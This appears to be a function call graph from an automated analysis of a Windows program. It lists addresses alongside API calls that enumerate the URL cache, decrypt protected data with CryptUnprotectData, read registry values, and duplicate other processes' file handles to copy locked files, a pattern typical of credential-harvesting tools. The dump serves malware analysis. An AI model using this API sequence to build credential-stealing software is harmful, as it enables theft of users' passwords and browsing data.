409c70 2 API calls 38617->38618 38619 40b732 wcsrchr 38618->38619 38620 40b743 38619->38620 38621 40b746 memset 38619->38621 38620->38621 38622 40b2cc 27 API calls 38621->38622 38623 40b76f 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 40b783 38624->38625 39183 409b98 GetFileAttributesW 38625->39183 38627 40b792 38628 40b7c2 38627->38628 38629 409c70 2 API calls 38627->38629 39184 40bb98 38628->39184 38631 40b7a5 38629->38631 38633 40b2cc 27 API calls 38631->38633 38636 40b7b2 38633->38636 38634 40b837 CloseHandle 38638 40b83e memset 38634->38638 38635 40b817 39267 409a45 GetTempPathW 38635->39267 38639 409d1f 6 API calls 38636->38639 39217 40a6e6 WideCharToMultiByte 38638->39217 38639->38628 38640 40b827 CopyFileW 38640->38638 38642 40b866 39218 444432 38642->39218 38645 40bad5 38647 40baeb 38645->38647 38648 40bade DeleteFileW 38645->38648 38646 40b273 27 API calls 38649 40b89a 38646->38649 38650 40b04b ??3@YAXPAX 38647->38650 38648->38647 39264 438552 38649->39264 38652 40baf3 38650->38652 38652->38220 38654 40bacd 39298 443d90 111 API calls 38654->39298 38657 40bac6 39297 424f26 123 API calls 38657->39297 38658 40b8bd memset 39288 425413 17 API calls 38658->39288 38661 425413 17 API calls 38678 40b8b8 38661->38678 38664 40a71b MultiByteToWideChar 38664->38678 38667 40b9b5 memcmp 38667->38678 38668 4099c6 2 API calls 38668->38678 38669 404423 38 API calls 38669->38678 38672 40bb3e memset memcpy 39299 40a734 MultiByteToWideChar 38672->39299 38673 4251c4 137 API calls 38673->38678 38675 40bb88 LocalFree 38675->38678 38678->38657 38678->38658 38678->38661 38678->38664 38678->38667 38678->38668 38678->38669 38678->38672 38678->38673 38679 40ba5f memcmp 38678->38679 38680 40a734 MultiByteToWideChar 38678->38680 39289 4253ef 16 API calls 38678->39289 39290 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38678->39290 39291 4253af 17 API calls 38678->39291 39292 4253cf 17 API calls 38678->39292 39293 447280 memset 38678->39293 39294 447960 memset memcpy memcpy memcpy 38678->39294 39295 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38678->39295 39296 447920 memcpy memcpy memcpy 38678->39296 38679->38678 38680->38678 38681->38222 38683 40aebe FindClose 38682->38683 38684 40ae21 38683->38684 38685 4099c6 2 API calls 38684->38685 38686 40ae35 38685->38686 38687 409d1f 6 API calls 38686->38687 38688 40ae49 38687->38688 38688->38262 38690 40ade0 38689->38690 38693 40ae0f 38689->38693 38691 40ade7 wcscmp 38690->38691 38690->38693 38692 40adfe wcscmp 38691->38692 38691->38693 38692->38693 38693->38262 38695 40ae7b FindNextFileW 38694->38695 38696 40ae5c FindFirstFileW 38694->38696 38697 40ae94 38695->38697 38698 40ae8f 38695->38698 38696->38697 38700 40aeb6 38697->38700 38701 409d1f 6 API calls 38697->38701 38699 40aebe FindClose 38698->38699 38699->38697 38700->38262 38701->38700 38703 40aed1 38702->38703 38704 40aec7 FindClose 38702->38704 38703->38276 38704->38703 38706 4099d7 38705->38706 38707 4099da memcpy 38705->38707 38706->38707 38707->38206 38709 40b2cc 27 API calls 38708->38709 38710 44543f 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 44544f 38711->38712 39657 409b98 GetFileAttributesW 38712->39657 38714 445476 38717 40b2cc 27 API calls 38714->38717 38715 44545e 38715->38714 38716 40b6ef 253 API calls 38715->38716 38716->38714 38718 445482 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 445492 38719->38720 39658 409b98 GetFileAttributesW 38720->39658 38722 4454a1 38723 4454b9 38722->38723 38724 40b6ef 253 API calls 38722->38724 38723->38235 38724->38723 38725->38234 38726->38252 38727->38259 38728->38297 38729->38279 38730->38324 38731->38324 38732->38306 38733->38335 38734->38337 38735->38339 38737 414c2e 17 API calls 38736->38737 38738 40c2ae 38737->38738 38794 40c1d3 38738->38794 38743 40c3be 38760 40a8ab 38743->38760 38744 40afcf 2 API calls 38745 40c2fd FindFirstUrlCacheEntryW 38744->38745 38746 40c3b6 38745->38746 38747 40c31e wcschr 38745->38747 38748 40b04b ??3@YAXPAX 38746->38748 38749 40c331 38747->38749 38750 40c35e FindNextUrlCacheEntryW 38747->38750 38748->38743 38751 40a8ab 9 API calls 38749->38751 38750->38747 38752 40c373 GetLastError 38750->38752 38755 40c33e wcschr 38751->38755 38753 40c3ad FindCloseUrlCache 38752->38753 38754 40c37e 38752->38754 38753->38746 38756 40afcf 2 API calls 38754->38756 38755->38750 38757 40c34f 38755->38757 38758 40c391 FindNextUrlCacheEntryW 38756->38758 38759 40a8ab 9 API calls 38757->38759 38758->38747 38758->38753 38759->38750 38888 40a97a 38760->38888 38763 40a8cc 38763->38346 38764 40a8d0 7 API calls 38764->38763 38893 40b1ab free free 38765->38893 38767 40c3dd 38768 40b2cc 27 API calls 38767->38768 38769 40c3e7 38768->38769 38894 414592 RegOpenKeyExW 38769->38894 38771 40c3f4 38772 40c50e 38771->38772 38773 40c3ff 38771->38773 38787 405337 38772->38787 38774 40a9ce 4 API calls 38773->38774 38775 40c418 memset 38774->38775 38895 40aa1d 38775->38895 38778 40c471 38780 40c47a _wcsupr 38778->38780 38779 40c505 RegCloseKey 38779->38772 38781 40a8d0 7 API calls 38780->38781 38782 40c498 38781->38782 38783 40a8d0 7 API calls 38782->38783 38784 40c4ac memset 38783->38784 38785 40aa1d 38784->38785 38786 40c4e4 RegEnumValueW 38785->38786 38786->38779 38786->38780 38897 405220 38787->38897 38790->38357 38791->38359 38792->38360 38793->38353 38795 40ae18 9 API calls 38794->38795 38801 40c210 38795->38801 38796 40ae51 9 API calls 38796->38801 38797 40c264 38798 40aebe FindClose 38797->38798 38800 40c26f 38798->38800 38799 40add4 2 API calls 38799->38801 38806 40e5ed memset memset 38800->38806 38801->38796 38801->38797 38801->38799 38802 40c231 _wcsicmp 38801->38802 38803 40c1d3 35 API calls 38801->38803 38802->38801 38804 40c248 38802->38804 38803->38801 38819 40c084 22 API calls 38804->38819 38807 414c2e 17 API calls 38806->38807 38808 40e63f 38807->38808 38809 409d1f 6 API calls 38808->38809 38810 40e658 38809->38810 38820 409b98 GetFileAttributesW 38810->38820 38812 40e667 38813 40e680 38812->38813 38815 409d1f 6 API calls 38812->38815 38821 409b98 GetFileAttributesW 38813->38821 38815->38813 38816 40e68f 38818 40c2d8 38816->38818 38822 40e4b2 38816->38822 38818->38743 38818->38744 38819->38801 38820->38812 38821->38816 38843 40e01e 38822->38843 38824 40e593 38825 40e5b0 38824->38825 38826 40e59c DeleteFileW 38824->38826 38828 40b04b ??3@YAXPAX 38825->38828 38826->38825 38827 40e521 38827->38824 38866 40e175 38827->38866 38829 40e5bb 38828->38829 38831 40e5c4 CloseHandle 38829->38831 38832 40e5cc 38829->38832 38831->38832 38834 40b633 free 38832->38834 38833 40e573 38836 40e584 38833->38836 38837 40e57c CloseHandle 38833->38837 38835 40e5db 38834->38835 38840 40b633 free 38835->38840 38887 40b1ab free free 38836->38887 38837->38836 38839 40e540 38839->38833 38886 40e2ab 30 API calls 38839->38886 38841 40e5e3 38840->38841 38841->38818 38844 406214 22 API calls 38843->38844 38845 40e03c 38844->38845 38846 40e16b 38845->38846 38847 40dd85 75 API calls 38845->38847 38846->38827 38848 40e06b 38847->38848 38848->38846 38849 40afcf ??2@YAPAXI ??3@YAXPAX 38848->38849 38850 40e08d OpenProcess 38849->38850 38851 40e0a4 GetCurrentProcess DuplicateHandle 38850->38851 38855 40e152 38850->38855 38852 40e0d0 GetFileSize 38851->38852 38853 40e14a CloseHandle 38851->38853 38856 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38852->38856 38853->38855 38854 40e160 38858 40b04b ??3@YAXPAX 38854->38858 38855->38854 38857 406214 22 API calls 38855->38857 38859 40e0ea 38856->38859 38857->38854 38858->38846 38860 4096dc CreateFileW 38859->38860 38861 40e0f1 CreateFileMappingW 38860->38861 38862 40e140 CloseHandle CloseHandle 38861->38862 38863 40e10b MapViewOfFile 38861->38863 38862->38853 38864 40e13b CloseHandle 38863->38864 38865 40e11f WriteFile UnmapViewOfFile 38863->38865 38864->38862 38865->38864 38867 40e18c 38866->38867 38868 406b90 11 API calls 38867->38868 38869 40e19f 38868->38869 38870 40e1a7 memset 38869->38870 38871 40e299 38869->38871 38876 40e1e8 38870->38876 38872 4069a3 ??3@YAXPAX free 38871->38872 38873 40e2a4 38872->38873 38873->38839 38874 406e8f 13 API calls 38874->38876 38875 406b53 SetFilePointerEx ReadFile 38875->38876 38876->38874 38876->38875 38877 40e283 38876->38877 38878 40dd50 _wcsicmp 38876->38878 38882 40742e 8 API calls 38876->38882 38883 40aae3 wcslen wcslen _memicmp 38876->38883 38884 40e244 _snwprintf 38876->38884 38879 40e291 38877->38879 38880 40e288 free 38877->38880 38878->38876 38881 40aa04 free 38879->38881 38880->38879 38881->38871 38882->38876 38883->38876 38885 40a8d0 7 API calls 38884->38885 38885->38876 38886->38839 38887->38824 38892 40a980 38888->38892 38889 40a8bb 38889->38763 38889->38764 38890 40a995 _wcsicmp 38890->38892 38891 40a99c wcscmp 38891->38892 38892->38889 38892->38890 38892->38891 38893->38767 38894->38771 38896 40aa23 RegEnumValueW 38895->38896 38896->38778 38896->38779 38898 405335 38897->38898 38899 40522a 38897->38899 38898->38360 38900 40b2cc 27 API calls 38899->38900 38901 405234 38900->38901 38902 40a804 8 API calls 38901->38902 38903 40523a 38902->38903 38942 40b273 38903->38942 38905 405248 _mbscpy _mbscat GetProcAddress 38906 40b273 27 API calls 38905->38906 38907 405279 38906->38907 38945 405211 GetProcAddress 38907->38945 38909 405282 38910 40b273 27 API calls 38909->38910 38911 40528f 38910->38911 38946 405211 GetProcAddress 38911->38946 38913 405298 38914 40b273 27 API calls 38913->38914 38915 4052a5 38914->38915 38947 405211 GetProcAddress 38915->38947 38917 4052ae 38918 40b273 27 API calls 38917->38918 38919 4052bb 38918->38919 38948 405211 GetProcAddress 38919->38948 38921 4052c4 38922 40b273 27 API calls 38921->38922 38923 4052d1 38922->38923 38949 405211 GetProcAddress 38923->38949 38925 4052da 38926 40b273 27 API calls 38925->38926 38927 4052e7 38926->38927 38950 405211 GetProcAddress 38927->38950 38929 4052f0 38930 40b273 27 API calls 38929->38930 38931 4052fd 38930->38931 38951 405211 GetProcAddress 38931->38951 38933 405306 38934 40b273 27 API calls 38933->38934 38935 405313 38934->38935 38952 405211 GetProcAddress 38935->38952 38937 40531c 38938 40b273 27 API calls 38937->38938 38939 405329 38938->38939 38953 405211 GetProcAddress 38939->38953 38941 405332 38941->38898 38943 40b58d 27 API calls 38942->38943 38944 40b18c 38943->38944 38944->38905 38945->38909 38946->38913 38947->38917 38948->38921 38949->38925 38950->38929 38951->38933 38952->38937 38953->38941 38955 40440c FreeLibrary 38954->38955 38956 40436d 38955->38956 38957 40a804 8 API calls 38956->38957 38958 404377 38957->38958 38959 404383 38958->38959 38960 404405 38958->38960 38961 40b273 27 API calls 38959->38961 38960->38365 38960->38367 38960->38368 38962 40438d GetProcAddress 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4043a7 GetProcAddress 38963->38964 38965 40b273 27 API calls 38964->38965 38966 4043ba GetProcAddress 38965->38966 38967 40b273 27 API calls 38966->38967 38968 4043ce GetProcAddress 38967->38968 38969 40b273 27 API calls 38968->38969 38970 4043e2 GetProcAddress 38969->38970 38971 4043f1 38970->38971 38972 4043f7 38971->38972 38973 40440c FreeLibrary 38971->38973 38972->38960 38973->38960 38975 404413 FreeLibrary 38974->38975 38976 40441e 38974->38976 38975->38976 38976->38382 38977->38378 38979 40447e 38978->38979 38980 40442e 38978->38980 38981 404485 CryptUnprotectData 38979->38981 38982 40449c 38979->38982 38983 40b2cc 27 API calls 38980->38983 38981->38982 38982->38378 38984 404438 38983->38984 38985 40a804 8 API calls 38984->38985 38986 40443e 38985->38986 38987 404445 38986->38987 38988 404467 38986->38988 38989 40b273 27 API calls 38987->38989 38988->38979 38990 404475 FreeLibrary 38988->38990 38991 40444f GetProcAddress 38989->38991 38990->38979 38991->38988 38992 404460 38991->38992 38992->38988 38994 4135f6 38993->38994 38995 4135eb FreeLibrary 38993->38995 38994->38385 38995->38994 38997 4449c4 38996->38997 38998 444a52 38996->38998 38999 40b2cc 27 API calls 38997->38999 38998->38405 38998->38406 39000 4449cb 38999->39000 39001 40a804 8 API calls 39000->39001 39002 4449d1 39001->39002 39003 40b273 27 API calls 39002->39003 39004 4449dc GetProcAddress 39003->39004 39005 40b273 27 API calls 39004->39005 39006 4449f3 GetProcAddress 39005->39006 39007 40b273 27 API calls 39006->39007 39008 444a04 GetProcAddress 39007->39008 39009 40b273 27 API calls 39008->39009 39010 444a15 GetProcAddress 39009->39010 39011 40b273 27 API calls 39010->39011 39012 444a26 GetProcAddress 39011->39012 39013 40b273 27 API calls 39012->39013 39014 444a37 GetProcAddress 39013->39014 39015 40b273 27 API calls 39014->39015 39017->38416 39018->38416 39019->38416 39020->38416 39021->38407 39023 403a29 39022->39023 39037 403bed memset memset 39023->39037 39025 403ae7 39050 40b1ab free free 39025->39050 39026 403a3f memset 39031 403a2f 39026->39031 39028 403aef 39028->38423 39029 40a8d0 7 API calls 39029->39031 39030 409d1f 6 API calls 39030->39031 39031->39025 39031->39026 39031->39029 39031->39030 39032 409b98 GetFileAttributesW 39031->39032 39032->39031 39034 40a051 GetFileTime CloseHandle 39033->39034 39035 4039ca CompareFileTime 39033->39035 39034->39035 39035->38423 39036->38424 39038 414c2e 17 API calls 39037->39038 39039 403c38 39038->39039 39040 409719 2 API calls 39039->39040 39041 403c3f wcscat 39040->39041 39042 414c2e 17 API calls 39041->39042 39043 403c61 39042->39043 39044 409719 2 API calls 39043->39044 39045 403c68 wcscat 39044->39045 39051 403af5 39045->39051 39048 403af5 20 API calls 39049 403c95 39048->39049 39049->39031 39050->39028 39052 403b02 39051->39052 39053 40ae18 9 API calls 39052->39053 39061 403b37 39053->39061 39054 403bdb 39056 40aebe FindClose 39054->39056 39055 40add4 wcscmp wcscmp 39055->39061 39057 403be6 39056->39057 39057->39048 39058 40ae18 9 API calls 39058->39061 39059 40ae51 9 API calls 39059->39061 39060 40aebe FindClose 39060->39061 39061->39054 39061->39055 39061->39058 39061->39059 39061->39060 39062 40a8d0 7 API calls 39061->39062 39062->39061 39064 409d1f 6 API calls 39063->39064 39065 404190 39064->39065 39078 409b98 GetFileAttributesW 39065->39078 39067 40419c 39068 4041a7 6 API calls 39067->39068 39069 40435c 39067->39069 39071 40424f 39068->39071 39069->38450 39071->39069 39072 40425e memset 39071->39072 39074 409d1f 6 API calls 39071->39074 39075 40a8ab 9 API calls 39071->39075 39079 414842 39071->39079 39072->39071 39073 404296 wcscpy 39072->39073 39073->39071 39074->39071 39076 4042b6 memset memset _snwprintf wcscpy 39075->39076 39076->39071 39077->38448 39078->39067 39082 41443e 39079->39082 39081 414866 39081->39071 39083 41444b 39082->39083 39084 414451 39083->39084 39085 4144a3 GetPrivateProfileStringW 39083->39085 39086 414491 39084->39086 39087 414455 wcschr 39084->39087 39085->39081 39089 414495 WritePrivateProfileStringW 39086->39089 39087->39086 39088 414463 _snwprintf 39087->39088 39088->39089 39089->39081 39090->38454 39092 40b2cc 27 API calls 39091->39092 39093 409615 39092->39093 39094 409d1f 6 API calls 39093->39094 39095 409625 39094->39095 39118 409b98 GetFileAttributesW 39095->39118 39097 409634 39098 409648 39097->39098 39135 4091b8 241 API calls 39097->39135 39100 40b2cc 27 API calls 39098->39100 39102 408801 39098->39102 39101 40965d 39100->39101 39103 409d1f 6 API calls 39101->39103 39102->38457 39102->38458 39104 40966d 39103->39104 39119 409b98 GetFileAttributesW 39104->39119 39106 40967c 39106->39102 39120 409529 39106->39120 39108->38480 39118->39097 39119->39106 39136 4096c3 CreateFileW 39120->39136 39122 409543 39123 409550 GetFileSize 39122->39123 39134 4095cd 39122->39134 39124 409577 CloseHandle 39123->39124 39125 40955f 39123->39125 39131 409585 39124->39131 39124->39134 39126 40afcf 2 API calls 39125->39126 39127 409569 39126->39127 39137 40a2ef ReadFile 39127->39137 39129 409574 39129->39124 39130 4095c3 39139 40908b 57 API calls 39130->39139 39131->39130 39131->39134 39138 408b8d 38 API calls 39131->39138 39134->39102 39135->39098 39136->39122 39137->39129 39138->39131 39139->39134 39167 413f4f 39140->39167 39143 413f37 K32GetModuleFileNameExW 39144 413f4a 39143->39144 39144->38518 39146 413969 wcscpy 39145->39146 39147 41396c wcschr 39145->39147 39158 413a3a 39146->39158 39147->39146 39149 41398e 39147->39149 39172 4097f7 wcslen wcslen _memicmp 39149->39172 39151 41399a 39152 4139a4 memset 39151->39152 39153 4139e6 39151->39153 39173 409dd5 GetWindowsDirectoryW wcscpy 39152->39173 39154 413a31 wcscpy 39153->39154 39155 4139ec memset 39153->39155 39154->39158 39174 409dd5 GetWindowsDirectoryW wcscpy 39155->39174 39158->38518 39159 4139c9 wcscpy wcscat 39159->39158 39160 413a11 memcpy wcscat 39160->39158 39162 413cb0 GetModuleHandleW 39161->39162 39163 413cda 39161->39163 39162->39163 39164 413cbf GetProcAddress 39162->39164 39165 413ce3 GetProcessTimes 39163->39165 39166 413cf6 39163->39166 39164->39163 39165->38520 39166->38520 39168 413f2f 39167->39168 39169 413f54 39167->39169 39168->39143 39168->39144 39170 40a804 8 API calls 39169->39170 39171 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39170->39171 39171->39168 39172->39151 39173->39159 39174->39160 39175->38540 39176->38563 39178 409cf9 GetVersionExW 39177->39178 39179 409d0a 39177->39179 39178->39179 39179->38569 39179->38575 39180->38577 39181->38580 39182->38582 39183->38627 39185 40bba5 39184->39185 39300 40cc26 39185->39300 39188 40bd4b 39321 40cc0c 39188->39321 39193 40b2cc 27 API calls 39194 40bbef 39193->39194 39328 40ccf0 _wcsicmp 39194->39328 39196 40bbf5 39196->39188 39329 40ccb4 6 API calls 39196->39329 39198 40bc26 39199 40cf04 17 API calls 39198->39199 39200 40bc2e 39199->39200 39201 40bd43 39200->39201 39202 40b2cc 27 API calls 39200->39202 39203 40cc0c 4 API calls 39201->39203 39204 40bc40 39202->39204 39203->39188 39330 40ccf0 _wcsicmp 39204->39330 39206 40bc46 39206->39201 39207 40bc61 memset memset WideCharToMultiByte 39206->39207 39331 40103c strlen 39207->39331 39209 40bcc0 39210 40b273 27 API calls 39209->39210 39211 40bcd0 memcmp 39210->39211 39211->39201 39212 40bce2 39211->39212 39213 404423 38 API calls 39212->39213 39214 40bd10 39213->39214 39214->39201 39215 40bd3a LocalFree 39214->39215 39216 40bd1f memcpy 39214->39216 39215->39201 39216->39215 39217->38642 39391 4438b5 39218->39391 39220 44444c 39226 40b879 39220->39226 39405 415a6d 39220->39405 39222 444486 39225 4444b9 memcpy 39222->39225 39263 4444a4 39222->39263 39224 44469e 39224->39226 39456 443d90 111 API calls 39224->39456 39409 415258 39225->39409 39226->38645 39226->38646 39229 444524 39230 444541 39229->39230 39231 44452a 39229->39231 39412 444316 39230->39412 39446 416935 16 API calls 39231->39446 39235 444316 18 API calls 39236 444563 39235->39236 39237 444316 18 API calls 39236->39237 39238 44456f 39237->39238 39239 444316 18 API calls 39238->39239 39240 44457f 39239->39240 39240->39263 39426 432d4e 39240->39426 39243 444316 18 API calls 39244 4445b0 39243->39244 39430 41eed2 39244->39430 39246 4445cf 39247 4445d6 39246->39247 39248 4445ee 39246->39248 39447 416935 16 API calls 39247->39447 39448 43302c memset 39248->39448 39251 4445fa 39449 43302c memset 39251->39449 39253 444609 39253->39263 39450 416935 16 API calls 39253->39450 39255 444646 39451 434d4b 17 API calls 39255->39451 39257 44464d 39452 437655 16 API calls 39257->39452 39259 444653 39453 4442e6 11 API calls 39259->39453 39261 44465d 39261->39263 39454 416935 16 API calls 39261->39454 39455 4442e6 11 API calls 39263->39455 39494 438460 39264->39494 39266 40b8a4 39266->38654 39270 4251c4 39266->39270 39268 409a74 GetTempFileNameW 39267->39268 39269 409a66 GetWindowsDirectoryW 39267->39269 39268->38640 39269->39268 39591 424f07 11 API calls 39270->39591 39272 4251e4 39273 4251f7 39272->39273 39274 4251e8 39272->39274 39593 4250f8 39273->39593 39592 4446ea 11 API calls 39274->39592 39276 4251f2 39276->38678 39278 425209 39281 425249 39278->39281 39284 4250f8 127 API calls 39278->39284 39285 425287 39278->39285 39601 4384e9 135 API calls 39278->39601 39602 424f74 124 API calls 39278->39602 39281->39285 39603 424ff0 13 API calls 39281->39603 39284->39278 39605 415c7d 16 API calls 39285->39605 39286 425266 39286->39285 39604 415be9 memcpy 39286->39604 39288->38678 39289->38678 39290->38678 39291->38678 39292->38678 39293->38678 39294->38678 39295->38678 39296->38678 39297->38654 39298->38645 39299->38675 39332 4096c3 CreateFileW 39300->39332 39302 40cc34 39303 40cc3d GetFileSize 39302->39303 39311 40bbca 39302->39311 39304 40afcf 2 API calls 39303->39304 39305 40cc64 39304->39305 39333 40a2ef ReadFile 39305->39333 39307 40cc71 39334 40ab4a MultiByteToWideChar 39307->39334 39309 40cc95 CloseHandle 39310 40b04b ??3@YAXPAX 39309->39310 39310->39311 39311->39188 39312 40cf04 39311->39312 39313 40b633 free 39312->39313 39314 40cf14 39313->39314 39340 40b1ab free free 39314->39340 39316 40bbdd 39316->39188 39316->39193 39317 40cf1b 39317->39316 39319 40cfef 39317->39319 39341 40cd4b 39317->39341 39320 40cd4b 14 API calls 39319->39320 39320->39316 39322 40b633 free 39321->39322 39323 40cc15 39322->39323 39324 40aa04 free 39323->39324 39325 40cc1d 39324->39325 39390 40b1ab free free 39325->39390 39327 40b7d4 memset CreateFileW 39327->38634 39327->38635 39328->39196 39329->39198 39330->39206 39331->39209 39332->39302 39333->39307 39335 40ab93 39334->39335 39336 40ab6b 39334->39336 39335->39309 39337 40a9ce 4 API calls 39336->39337 39338 40ab74 39337->39338 39339 40ab7c MultiByteToWideChar 39338->39339 39339->39335 39340->39317 39342 40cd7b 39341->39342 39375 40aa29 39342->39375 39344 40cef5 39345 40aa04 free 39344->39345 39346 40cefd 39345->39346 39346->39317 39348 40aa29 6 API calls 39349 40ce1d 39348->39349 39350 40aa29 6 API calls 39349->39350 39351 40ce3e 39350->39351 39352 40ce6a 39351->39352 39383 40abb7 wcslen memmove 39351->39383 39353 40ce9f 39352->39353 39386 40abb7 wcslen memmove 39352->39386 39355 40a8d0 7 API calls 39353->39355 39358 40ceb5 39355->39358 39356 40ce56 39384 40aa71 wcslen 39356->39384 39364 40a8d0 7 API calls 39358->39364 39360 40ce8b 39387 40aa71 wcslen 39360->39387 39361 40ce5e 39385 40abb7 wcslen memmove 39361->39385 39366 40cecb 39364->39366 39365 40ce93 39388 40abb7 wcslen memmove 39365->39388 39389 40d00b malloc memcpy free free 39366->39389 39369 40cedd 39370 40aa04 free 39369->39370 39371 40cee5 39370->39371 39372 40aa04 free 39371->39372 39373 40ceed 39372->39373 39374 40aa04 free 39373->39374 39374->39344 39376 40aa33 39375->39376 39377 40aa63 39375->39377 39378 40aa44 39376->39378 39379 40aa38 wcslen 39376->39379 39377->39344 39377->39348 39380 40a9ce malloc memcpy free free 39378->39380 39379->39378 39381 40aa4d 39380->39381 39381->39377 39382 40aa51 memcpy 39381->39382 39382->39377 39383->39356 39384->39361 39385->39352 39386->39360 39387->39365 39388->39353 39389->39369 39390->39327 39392 4438d0 39391->39392 39402 4438c9 39391->39402 39457 415378 memcpy memcpy 39392->39457 39402->39220 39406 415a77 39405->39406 39407 415a8d 39406->39407 39408 415a7e memset 39406->39408 39407->39222 39408->39407 39410 4438b5 11 API calls 39409->39410 39411 41525d 39410->39411 39411->39229 39413 444328 39412->39413 39414 444423 39413->39414 39415 44434e 39413->39415 39460 4446ea 11 API calls 39414->39460 39417 432d4e 3 API calls 39415->39417 39418 44435a 39417->39418 39420 444375 39418->39420 39425 44438b 39418->39425 39419 432d4e 3 API calls 39421 4443ec 39419->39421 39458 416935 16 API calls 39420->39458 39423 444381 39421->39423 39459 416935 16 API calls 39421->39459 39423->39235 39425->39419 39427 432d65 39426->39427 39428 432d58 39426->39428 39427->39243 39461 432cc4 memset memset memcpy 39428->39461 39431 41eee2 39430->39431 39432 415a6d memset 39431->39432 39433 41ef23 39432->39433 39434 415a6d memset 39433->39434 39438 41ef2d 39433->39438 39435 41ef42 39434->39435 39440 41ef49 39435->39440 39462 41b7d9 39435->39462 39437 41ef66 39439 41ef74 memset 39437->39439 39437->39440 39438->39246 39441 41ef91 39439->39441 39444 41ef9e 39439->39444 39440->39438 39480 41b321 101 API calls 39440->39480 39476 41519d 39441->39476 39444->39440 39479 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39444->39479 39446->39263 39447->39263 39448->39251 39449->39253 39450->39255 39451->39257 39452->39259 39453->39261 39454->39263 39455->39224 39456->39226 39458->39423 39459->39423 39460->39423 39461->39427 39463 41b812 39462->39463 39471 41b884 39463->39471 39474 41b849 39463->39474 39481 444706 11 API calls 39463->39481 39464 415a6d memset 39465 41b8c2 39464->39465 39466 41b980 39465->39466 39467 41b902 memcpy memcpy memcpy memcpy memcpy 39465->39467 39465->39474 39473 41b9ad 39466->39473 39482 4151e3 39466->39482 39467->39466 39470 41ba12 39472 41ba32 memset 39470->39472 39470->39474 39471->39464 39471->39474 39472->39474 39473->39474 39485 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39473->39485 39474->39437 39486 4175ed 39476->39486 39479->39440 39480->39438 39481->39471 39484 41837f 55 API calls 39482->39484 39483 4151f9 39483->39473 39484->39483 39485->39470 39487 417570 SetFilePointer GetLastError GetLastError 39486->39487 39488 4175ff 39487->39488 39489 41760a ReadFile 39488->39489 39492 4151b3 39488->39492 39490 417637 39489->39490 39491 417627 GetLastError 39489->39491 39490->39492 39493 41763e memset 39490->39493 39491->39492 39492->39444 39493->39492 39506 41703f 39494->39506 39496 43847a 39497 43848a 39496->39497 39498 43847e 39496->39498 39513 438270 39497->39513 39543 4446ea 11 API calls 39498->39543 39502 438488 39502->39266 39504 4384bb 39505 438270 134 API calls 39504->39505 39505->39502 39507 417044 39506->39507 39508 41705c 39506->39508 39512 417055 39507->39512 39545 416760 11 API calls 39507->39545 39509 417075 39508->39509 39546 41707a 11 API calls 39508->39546 39509->39496 39512->39496 39547 415a91 39513->39547 39515 43828d 39516 438297 39515->39516 39517 438341 39515->39517 39519 4382d6 39515->39519 39590 415c7d 16 API calls 39516->39590 39551 44358f 39517->39551 39522 4382fb 39519->39522 39523 4382db 39519->39523 39521 438458 39521->39502 39544 424f26 123 API calls 39521->39544 39584 415c23 memcpy 39522->39584 39582 416935 16 API calls 39523->39582 39526 438305 39530 44358f 19 API calls 39526->39530 39532 438318 39526->39532 39527 4382e9 39583 415c7d 16 API calls 39527->39583 39529 438373 39535 438383 39529->39535 39585 4300e8 memset memset memcpy 39529->39585 39530->39532 39532->39529 39577 43819e 39532->39577 39534 4383cd 39536 4383f5 39534->39536 39587 42453e 123 API calls 39534->39587 39535->39534 39586 415c23 memcpy 39535->39586 39539 438404 39536->39539 39540 43841c 39536->39540 39588 416935 16 API calls 39539->39588 39589 416935 16 API calls 39540->39589 39543->39502 39544->39504 39545->39512 39546->39507 39548 415a9d 39547->39548 39549 415ab3 39548->39549 39550 415aa4 memset 39548->39550 39549->39515 39550->39549 39553 4435be 39551->39553 39552 443676 39554 443758 39552->39554 39556 442ff8 19 API calls 39552->39556 39559 443737 39552->39559 39553->39552 39558 442ff8 19 API calls 39553->39558 39560 4436ce 39553->39560 39561 44366c 39553->39561 39575 44360c 39553->39575 39555 441409 memset 39554->39555 39567 443775 39554->39567 39555->39554 39556->39559 39557 442ff8 19 API calls 39557->39554 39558->39553 39559->39557 39563 4165ff 11 API calls 39560->39563 39564 4169a7 11 API calls 39561->39564 39562 4437be 39565 416760 11 API calls 39562->39565 39566 4437de 39562->39566 39563->39552 39564->39552 39565->39566 39568 42463b memset memcpy 39566->39568 39570 443801 39566->39570 39567->39562 39571 415c56 11 API calls 39567->39571 39568->39570 39569 443826 39572 43bd08 memset 39569->39572 39570->39569 39573 43024d memset 39570->39573 39571->39562 39574 443837 39572->39574 39573->39569 39574->39575 39576 43024d memset 39574->39576 39575->39532 39576->39574 39578 438246 39577->39578 39580 4381ba 39577->39580 39578->39529 39579 41f432 110 API calls 39579->39580 39580->39578 39580->39579 39581 41f638 104 API calls 39580->39581 39581->39580 39582->39527 39583->39516 39584->39526 39585->39535 39586->39534 39587->39536 39588->39516 39589->39516 39590->39521 39591->39272 39592->39276 39594 425108 39593->39594 39600 42510d 39593->39600 39638 424f74 124 API calls 39594->39638 39597 42516e 39639 415c7d 16 API calls 39597->39639 39598 425115 39598->39278 39600->39598 39606 42569b 39600->39606 39601->39278 39602->39278 39603->39286 39604->39285 39605->39276 39607 4256f1 39606->39607 39634 4259c2 39606->39634 39613 4259da 39607->39613 39617 422aeb memset memcpy memcpy 39607->39617 39618 429a4d 39607->39618 39623 4260a1 39607->39623 39632 429ac1 39607->39632 39607->39634 39637 425a38 39607->39637 39640 4227f0 memset memcpy 39607->39640 39641 422b84 15 API calls 39607->39641 39642 422b5d memset memcpy memcpy 39607->39642 39643 422640 13 API calls 39607->39643 39645 4241fc 11 API calls 39607->39645 39646 42413a 90 API calls 39607->39646 39612 4260dd 39651 424251 120 API calls 39612->39651 39650 416760 11 API calls 39613->39650 39617->39607 39619 429a66 39618->39619 39620 429a9b 39618->39620 39652 415c56 11 API calls 39619->39652 39624 429a96 39620->39624 39654 416760 11 API calls 39620->39654 39649 415c56 11 API calls 39623->39649 39655 424251 120 API calls 39624->39655 39626 429a7a 39653 416760 11 API calls 39626->39653 39633 425ad6 39632->39633 